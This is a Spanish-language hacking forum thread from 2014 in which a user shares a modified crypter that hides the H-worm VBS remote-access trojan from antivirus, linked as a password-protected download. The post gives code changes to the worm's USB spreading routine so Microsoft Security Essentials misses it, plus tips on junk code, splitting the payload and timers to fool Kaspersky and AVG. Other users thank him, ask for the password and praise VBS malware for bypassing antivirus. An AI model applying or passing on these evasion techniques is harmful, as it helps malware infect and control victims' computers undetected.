• Troyanos y Herramientas

  • Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
Comparte herramientas de administración remota y otras variantes de malware. Y acompaña una breve descripción de los mismos.
 #441129  por TITAN
 14 Abr 2014, 06:44
Gente aca les dejo esta joya que codeo MadAntrax le modifique un poco el code para que no sea detectado, encripta perfectamente el server de h-worm quedando un servidor de aprox 60kb. de acuerdo al scan es detectado por Trend Micro, pero no estoy seguro ya que no lo tengo instalado y sospecho que puede ser un error.

Nota1: Segun experimentos que hice en forma local security essentials no lo detecta a no ser que en la configuracion del servidor hayamos activado la funcion spread, en ese caso hay que modificar unas lineas en el servidor antes de encriptar, le muestro que es lo que se modifica para que no sea detectado por essentials cuando genera los accesos directos en la funcion spread

busquen estas lineas en el server h-worm

antes... funcion spread de archivos
Código: Seleccionar todo
"/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
asi debe quedar...
Código: Seleccionar todo
"/c start " & replace(file.name," ", chrw(34) & " " & chrw(34)) & "&start " & replace(installname," ", chrw(34) & " " & chrw(34)) &"&exit"
Mas abajo en el servidor esta el spread por carpetas hacen lo mismo remplazan siguiendo el mismo criterio.....
espero entiendan....la funcion spread lo que hace es generar un acceso directo por cada archivo que esta en el extraible usb y ejecuta 1ro el vbs y luego el archivo en cuestion, cambiando estas lineas de codigo primero se ejecutaria el archivo y luego el server script

Nota2: pueden agregar basura en el server antes de encriptar tambien probe combinaciones por ejemplo partir el servidor en 2 y encriptar en forma independiente luego unir los dos encriptados en un solo archivo solido, los que entienden un poco de script se daran cuenta.

Al encriptador le agregue basura y algunos temporizadores para engañar a los AV es el caso de kas, avg
Espero lo difruten, todo el credito para MadAntrax por codear esta maravilla.
Saludos!!


Imagen

Descarga aqui https://mega.nz/#!JtREGaQB!BlRiiEFU22tm ... 0nG6z5Vbto >>> reupload 11-03-18

scan realizado por el amigo otroyomismo http://www.indetectables.net/scanner.ph ... oka1bf4pvv

El pass : ***Mucho Cuidado con esto***

PD no me hago responsable del mal uso de esta herramienta jaja. No me llenen de MP
 #441131  por LeonDk
 14 Abr 2014, 07:19
Se agradece el aporte
 #441134  por genius89
 14 Abr 2014, 08:14
you can change and add codes that reduce detection...

What's the password
 #441143  por MadAntrax
 14 Abr 2014, 12:26
Bieeen, el primer mod de mi herramienta. Éstos son los motivos que me animan a publicar los sources :)

Tengo en el horno la versión 2.0 del crypter. Si quieres me pasas el mod y lo añado antes de publicarlo.

Saludos y buen trabajo
 #441150  por MataBarras
 14 Abr 2014, 14:19
Gracias Titan te quedo genial, más sabe el diablo por viejo que por diablo.
 #441185  por TITAN
 14 Abr 2014, 18:46
Gracias por los comentarios muchachos y tengan cuidado con los rat vbs úsenlos con precaución y discreción. Ya envié algunos pass saludos
 #441190  por CrypterHacker
 14 Abr 2014, 18:57
buena Mod bro gracias
 #441191  por SuC
 14 Abr 2014, 19:14
De lujo, la verdad que va bien el malware en vbs a la hora de bypassear av's!

Gracias MadAntrax y Titan!
 #441205  por Kaway
 14 Abr 2014, 21:17
Oh Gracias mano! agradece el aporte, és una Grand mod!!

Saludos brow!
 #441212  por BR NOVATO
 14 Abr 2014, 22:04
bueno trabajo !
 #441220  por jusa17
 14 Abr 2014, 23:25
te kedo muy bueno titan!!

saludos!
 #441240  por sudo
 15 Abr 2014, 03:28
 #441254  por bastien
 15 Abr 2014, 07:01
Visiblement super. Pourrais avoir le mot de passe?
 #441300  por TITAN
 15 Abr 2014, 21:14
ahi pase algunas contraseñas mas saludos !